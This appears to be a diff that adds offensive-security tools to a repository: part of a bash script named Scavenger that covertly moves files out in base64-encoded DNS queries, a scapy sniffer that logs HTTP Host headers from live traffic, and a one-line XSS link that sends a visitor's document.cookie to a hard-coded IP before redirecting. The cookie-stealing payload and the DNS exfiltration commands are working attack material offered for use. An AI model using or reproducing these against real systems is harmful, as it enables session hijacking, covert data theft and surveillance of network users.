+                                grep $host pcap | grep $domain pcap | cut -d ' ' -f 9 | cut -d '.' -f 1 | uniq | sed -e 's/\(EOF\)*$//g' > ./.temp2
+                                break
+                        fi
+                done
+                sed -i 's/?/+/g' ./.temp2
+                base64 -d ./.temp2 > $file
+                cleanup
+                exit
+
+	fi
+}
+function helpmenu {
+echo "
++++++++++++++++++Scavenger: DNS File Transfer and Receiving+++++++++++++++++
+-h  -----  This help mess
+-v  -----  verbose mode
+-z  -----  version/about
+*************Transmit Options*************
+-t  -----  You want to set up file transfer via the DNS protocol
+-f  -----  The input file to transfer; also takes in stdin '-'.  See example.
+-d  -----  The domain to use as the lookup string
+-q  -----  The timeout delay (sec) between DNS queries
+-s  -----  Destination server IP address
+*************Receive Options*************
+-r  -----  You want to receive a file transfer via the DNS protocol
+-p  -----  Host IP sending the data
+-i  -----  Listening interface
+-d  -----  The domain to look for in the DNS traffic
+-f  -----  The name to save the file as
+Examples:
+----|Transfer|----
+Required flags: f,d,q,s,t
+
+scavenger -f [inputfile] -d [domain] -q [dns query delay] -s [destination server IP] -t
+scavenger -f ./stegofile.jpg -d cyber.com -q 5 -s 8.8.8.8 -t
+echo "secret message" | ./scavenger -f - -d cyber.com -q 0 -s 8.8.8.8 -t
+
+----|Receiver (On 8.8.8.8 machine from previous ex.)|---- 
+Required flags: i,f,p,d,r
+
+scavenger -i [listening interface] -f [save-as name] -p [sender IP] -d [domain to listen for] -r
+scavenger -i eth0 -f ./stegofile.jpg -p 10.0.1.5 -d cyber.com -r
+
+Note1: You must have a receiver setup on the destination server's side to catch the DNS queries,
+prior to sending the traffic.
+Note2: You may need to preceed the script with sudo.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
+}
+function versioninfo {
+echo "
+*****************Scavenger*****************
+Scavenger is a script that leverages base64 encoding to transmit
+contents via the DNS protocol.
+
+Scavenger v1.0.6 Copyright (C) 2015 
+This program comes with ABSOLUTELY NO WARRANTY;
+This is free software, and you are welcome to redistribute it
+under certain conditions
+
+Last Updated: 10/12/2015
+"
+exit
+}
+arg="$*"
+NUMARGS="$#"
+if [[ $arg == *"-v"* ]]; then
+	echo "Number of arguments: $NUMARGS"
+	echo "Arguments entered: $arg"
+fi
+if [[ "$*" == *"-r"* ]] && [[ "$*" == *"-t"* ]]; then
+	echo "
+	=======================================================================
+	ERROR: You can only select -t OR -r NOT both, that wouldn't make sense.
+	======================================================================="
+	echo "Try -h for the help menu"
+	exit
+fi
+if [ $NUMARGS -eq 0 ]; then
+  helpmenu
+fi
+while getopts "zhf:d:q:s:p:i:vtr" option;
+do
+	case $option in	
+	h|\?) helpmenu
+	exit;;
+        f)      if [[ "$OPTARG" = "-" ]]; then
+                        file="${VAR:-/dev/stdin}"
+                        stdin="true"
+                else
+                        file="$OPTARG"
+                fi;;
+	d) domain="$OPTARG";;
+	q) timeout="$OPTARG";;
+	s) serverip="$OPTARG";;
+	p) host="$OPTARG";;
+	i) iface="$OPTARG";;
+	v) verbose=true;;
+	t) dnstransfer;;
+	r) dnsreceive;;
+	z) versioninfo;;
+esac
+done
+shift $((OPTIND-1))

sniff_urls

@@ -0,0 +1,92 @@
+import argparse
+from scapy.all import *
+import signal
+import sys
+from collections import Counter
+def printpattern(match):
+	if match:
+		print('[+] Found domain: ', match)
+		with open(output_file,'a') as f:
+			if output_file:
+				#f = open(output_file,'a')
+					f.write(match + '\n')
+	return
+
+def findmatches(pkt):
+#	global pattern
+	global output_file
+	raw = pkt.sprintf('%Raw.load%')
+	host = re.findall('Host:\s[-\w\.]+', raw)
+	if len(host) > 0:
+		match = re.sub('Host:\s','', host[0])
+		printpattern(match)
+		
+def cleanfile (file):
+	global sort
+	num_matches = 0
+	current_line = 0
+	with open(file, 'r+') as f:
+		index = 0
+		lines = f.readlines()
+		for sequence in lines:
+			if sequence.endswith('\n'):
+				sequence = re.sub('\n', '', sequence)
+				lines[index] = sequence
+			index += 1
+#        print(raw_lines.items())
+	enum_lines = dict(Counter(lines))
+	size = len(enum_lines)
+	line_num = 1
+#    print(enum_lines.items())
+	with open(sort, 'w') as f:
+		for key, value in enum_lines.items():
+			if line_num == size:
+				new_line = '[' + str(value) + ']' + ' ' + key
+				f.write(new_line)
+			else:
+				new_line = '[' + str(value) + ']' + ' ' + key + '\n'
+				f.write(new_line)
+			line_num += 1
+
+def signal_handler(signal, frame):
+	global output_file
+	global sort
+	print('[!] Keyboard interrupt detected.  Exiting...')
+	if sort:
+		cleanfile(output_file)
+		print("[!] Combined domains are here: '", sort,"'")
+	print("[!] Output File '", output_file, "' rearranged!")
+	sys.exit(0)
+    
+def main():
+	global output_file
+	global sort
+	parser = argparse.ArgumentParser(description='This tool is a simple network sniffer')
+	parser.add_argument('-i', '--interface', action='store', dest='interface', required='True'
+						, help='specify interface to listen on')
+	parser.add_argument('-o', '--output', action='store', dest='output' 
+						, help='specify an output file to log matches')
+	parser.add_argument('-s', '--sort', action='store', dest='sort', required='False' 
+						, help='use this flag to combine domains instances (recommended)')
+	args = vars(parser.parse_args())
+	int_face = args['interface']
+	output_file = args['output']
+	sort = args['sort']
+	if int_face == None:
+		parser.print_help()
+		exit(0)
+	else:
+		conf.iface = int_face
+		print('[*] Starting URL Sniffer.')
+	try:
+		print('[*] Beginning to sniff traffic on ' + int_face)
+		sniff(iface=int_face, count=0, filter="tcp", prn=findmatches, store=0)
+	except KeyboardInterrupt:
+		raise
+		print('[!] Keyboard interrupt signal detected.  Exiting...')
+		exit(0)
+
+if __name__ == '__main__':
+	signal.signal(signal.SIGINT, signal_handler)
+	output_file = ''
+	main()

xss_link

@@ -0,0 +1 @@
+<a href="javascript:onclick=document.location='http://10.0.1.4/verisign.php?sign='+document.cookie" "window.location.href='http://google.com'>Back</a>